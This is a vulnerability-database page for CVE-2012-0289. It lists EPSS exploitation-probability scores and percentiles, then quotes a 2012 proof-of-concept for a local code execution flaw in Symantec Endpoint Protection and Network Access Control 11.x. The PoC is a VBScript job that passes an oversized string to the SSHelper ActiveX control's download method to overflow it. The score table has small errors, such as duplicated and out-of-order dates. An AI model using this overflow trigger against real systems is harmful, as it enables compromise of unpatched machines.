CVE-2012-0289 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	1.83%	–	–
2022-02-13	–	–	1.83%	–	–
2022-04-03	–	–	1.83%	–	–
2022-05-08	–	–	1.82%	–	–
2022-06-26	–	–	1.82%	–	–
2022-08-07	–	–	1.76%	–	–
2022-08-28	–	–	1.76%	–	–
2023-03-05	–	–	1.76%	–	–
2023-03-12	–	–	–	0.12%	–
2023-06-18	–	–	–	0.12%	–
2023-08-20	–	–	–	0.24%	–
2023-10-29	–	–	–	0.24%	–
2023-12-03	–	–	–	0.24%	–
2023-12-10	–	–	–	0.24%	–
2024-02-11	–	–	–	0.24%	–
2024-02-25	–	–	–	0.17%	–
2024-04-07	–	–	–	0.17%	–
2024-06-02	–	–	–	0.21%	–
2024-06-16	–	–	–	0.19%	–
2024-06-23	–	–	–	0.19%	–
2024-08-04	–	–	–	0.19%	–
2024-08-11	–	–	–	0.27%	–
2024-09-29	–	–	–	0.38%	–
2024-11-03	–	–	–	0.38%	–
2024-12-22	–	–	–	0.38%	–
2025-01-12	–	–	–	0.3%	–
2025-03-02	–	–	–	0.34%	–
2025-03-09	–	–	–	0.34%	–
2025-01-19	–	–	–	0.3%	–
2025-03-09	–	–	–	0.34%	–
2025-03-18	–	–	–	–	0.56%
2025-04-15	–	–	–	–	0.56%
2025-04-15	–	–	–	–	0.56,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	54%
2022-02-13	55%
2022-04-03	75%
2022-05-08	75%
2022-06-26	76%
2022-08-07	75%
2022-08-28	76%
2023-03-05	77%
2023-03-12	44%
2023-06-18	45%
2023-08-20	61%
2023-10-29	62%
2023-12-03	61%
2023-12-10	62%
2024-02-11	61%
2024-02-25	52%
2024-04-07	53%
2024-06-02	59%
2024-06-16	56%
2024-06-23	57%
2024-08-04	56%
2024-08-11	68%
2024-09-29	73%
2024-11-03	74%
2024-12-22	73%
2025-01-12	69%
2025-03-02	71%
2025-03-09	72%
2025-01-19	69%
2025-03-09	72%
2025-03-18	66%
2025-04-15	67%
2025-04-15	67%

# Symantec End Point Protection 11.x & Symantec Network Access Control 11.x Local Code Execution POC # Date: 22/05/2012 # Author: 41.w4r10r # Software Link: Symantec.com # Version: 11.x # Tested on: # Windows XP SP2 English # Windows XP SP3 English # Windows Vista 32Bit # Windows 7 32Bit # CVE : CVE-2012-0289 Time Line: 30/08/2011 - Sent Details of the vulnerability 31/08/2011 - Symantec Requested Affected Version Details 31/08/2011 - Provided Requested Information with POC 27/09/2011 - Vulnerability Confirmed by Symantec 22/05/2012 - Advisory Released Symantec Advisory: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120522_01 Affected Products: Symantec Endpoint Protection 11.0 RU6(11.0.600x) 11.0 RU6-MP1(11.0.6100) 11.0 RU6-MP2(11.0.6200) 11.0 RU6-MP3(11.0.6300) 11.0 RU7(11.0.700x) 11.0 RU7-MP1(11.0.710x) Symantec Network Access Control 11.0 RU6(11.0.600x) 11.0 RU6-MP1(11.0.6100) 11.0 RU6-MP2(11.0.6200) 11.0 RU6-MP3(11.0.6300) 11.0 RU7(11.0.700x) 11.0 RU7-MP1(11.0.710x) Affected Resource: %%System%%\Symantec\Symantec Endpoint Protection\SSHelper.dll === POC === <?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:D59EBAD7-AF87-4A5C-8459-D3F6B918E7C9' id='target' /> <script language='vbscript'> prototype = "Function HIDownloadURLFile ( ByVal cookie As Long , ByVal url As String , ByVal file_path As String , ByVal rule_name As String , ByVal cancel_message As String , ByVal downloading_time As Long , ByVal bResume As Boolean , ByVal bShowProgressDlg As Boolean , ByVal bAllowCancel As Boolean , ByVal username As String , ByVal password As String , ByVal show_error_delay As Long ) As Long" memberName = "HIDownloadURLFile" progid = "SSHELPERLib.SSHelper" argCount = 12 arg1=1 arg2="defaultV" arg3="defaultV" arg4="defaultV" arg5="defaultV" arg6=1 arg7=True arg8=True arg9=True arg10="defaultV" arg11= String(6003, "A") arg12=1 target.HIDownloadURLFile arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8 ,arg9 ,arg10 ,arg11 ,arg12 </script></job></package>